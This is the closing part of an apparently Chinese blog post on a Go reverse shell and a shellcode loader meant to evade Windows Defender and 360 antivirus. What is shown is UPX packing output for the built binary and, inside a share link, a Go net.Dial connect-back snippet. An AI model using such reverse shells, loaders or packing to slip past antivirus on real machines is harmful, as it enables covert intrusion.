<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">D:\Tools\upx<span class="number">-3.95</span>-win64&gt;upx main.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          Copyright (C) <span class="number">1996</span> - <span class="number">2018</span></span><br><span class="line">UPX <span class="number">3.95</span>w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug <span class="number">26</span>th <span class="number">2018</span></span><br><span class="line"></span><br><span class="line">        File size         Ratio      Format      Name</span><br><span class="line">   --------------------   ------   -----------   -----------</span><br><span class="line">   <span class="number">1549312</span> -&gt;    <span class="number">538624</span>   <span class="number">34.77</span>%    win64/pe     main.exe                                                                                                       Packed <span class="number">1</span> file.</span><br><span class="line"></span><br><span class="line">D:\Tools\upx<span class="number">-3.95</span>-win64&gt;upx <span class="number">-9</span> main.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          Copyright (C) <span class="number">1996</span> - <span class="number">2018</span></span><br><span class="line">UPX <span class="number">3.95</span>w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug <span class="number">26</span>th <span class="number">2018</span></span><br><span class="line"></span><br><span class="line">        File size         Ratio      Format      Name</span><br><span class="line">   --------------------   ------   -----------   -----------</span><br><span class="line">   <span class="number">1549312</span> -&gt;    <span class="number">531456</span>   <span class="number">34.30</span>%    win64/pe     main.exe                                                                                                       Packed <span class="number">1</span> file.</span><br></pre></td></tr></table></figure>
<p>比不带参数可以小10k左右。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Windows-Reverse-Shell"><span class="toc-number">1.</span> <span class="toc-text">Windows Reverse Shell</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#补充："><span class="toc-number">1.0.1.</span> <span class="toc-text">补充：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ShellCodeLoader-ByPass-WD-or-360"><span class="toc-number">2.</span> <span class="toc-text">ShellCodeLoader ByPass WD or 360</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#如何精简binary体积？"><span class="toc-number">3.</span> <span class="toc-text">如何精简binary体积？</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://x51.online/2019/11/26/Golang-study-bypass-wd/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&text=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&is_video=false&description=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Golang Socket &amp; ShellcodeLoader&body=Check out this article: https://x51.online/2019/11/26/Golang-study-bypass-wd/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&name=Golang Socket &amp; ShellcodeLoader&description=&lt;p&gt;&lt;img src=&#34;/images/pasted-51.png&#34; alt=&#34;upload successful&#34;&gt; &lt;/p&gt;
&lt;h4 id=&#34;Windows-Reverse-Shell&#34;&gt;&lt;a href=&#34;#Windows-Reverse-Shell&#34; class=&#34;headerlink&#34; title=&#34;Windows Reverse Shell&#34;&gt;&lt;/a&gt;Windows Reverse Shell&lt;/h4&gt;&lt;p&gt;1、&lt;code&gt;net.Dial&lt;/code&gt;回连：  &lt;/p&gt;
&lt;figure class=&#34;highlight stata&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;backip := flag.&lt;span class=&#34;built_in&#34;&gt;String&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&#34;d&#34;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&#34;127.0.0.1&#34;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&#34;ServerIpAdddress&#34;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;backport := flag.Int(&lt;span class=&#34;string&#34;&gt;&#34;p&#34;&lt;/span&gt;, 1025, &lt;span class=&#34;string&#34;&gt;&#34;ServerPort&#34;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;flag.&lt;span class=&#34;keyword&#34;&gt;Parse&lt;/span&gt;()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;conn, &lt;span class=&#34;keyword&#34;&gt;err&lt;/span&gt; := &lt;span class=&#34;keyword&#34;&gt;net&lt;/span&gt;.Dial(&lt;span class=&#34;string&#34;&gt;&#34;tcp&#34;&lt;/span&gt;, *backip+&lt;span class=&#34;string&#34;&gt;&#34;:&#34;&lt;/span&gt;+strconv.Itoa(*backport))&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://x51.online/2019/11/26/Golang-study-bypass-wd/&t=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2021
    x51
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
